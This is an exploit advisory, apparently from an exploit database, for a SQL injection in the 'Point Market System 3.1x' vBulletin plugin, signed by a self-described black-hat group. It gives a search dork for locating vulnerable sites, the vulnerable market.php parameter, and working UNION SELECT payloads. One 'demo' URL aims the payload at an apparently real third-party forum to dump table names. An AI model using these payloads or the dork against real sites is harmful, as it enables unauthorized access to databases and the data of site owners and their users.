#(+)Exploit Title: Point Market System 3.1x vbulletin plugin SQL Injection Vulnerability #(+)Author : Net.Edit0r #(+) E-mail : Black.hat.tm@Gmail.com #(+) dork : intext:Point Market System 3.1x #(+) Versian : [3.1x] #(+) Category : Web Apps [SQl] #(+) Platform : Tested on: linux #(+) Download plugin : http://www.megaupload.com/?d=2R592KO0 ____________________________________________________________________ ____________________________________________________________________ You must register on the site ! The security problem in the file "market.Php" has been created. You can disable this security problem Plagn take it away. [~] Vulnerable File : # [+]http://localhost.com/market.php?do=cat&id=[SQL] [~] SQL injection Vulnerability # [+]-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13-- # [+]http://localhost.com/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13-- [~] Demo and Vedio : http://www.ehoza.com/v4/forum/market.php?do=cat&id=-1+union+select+1,group_concat%28table_name%29,3,4,5,6,@@version,8,9,10,11,12,13+from+information_schema.tables-- Vedio : http://www.multiupload.com/S28Z2FCZQD [~] Full Info plugin Point Market http://www.vbulletin.org/forum/showthread.php?p=2159503#post2159503 ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)IRANIAN Young HackerZ # Persian Gulf (+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly #BHG (+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ Virangar ~ S3cR3T ~ M4hd1 ~ Mikili ~ P0W3RFU7 ~ Ali.Erroor and all Friends (+)Gr33ts to : All Iranian HackerZ ########################################################################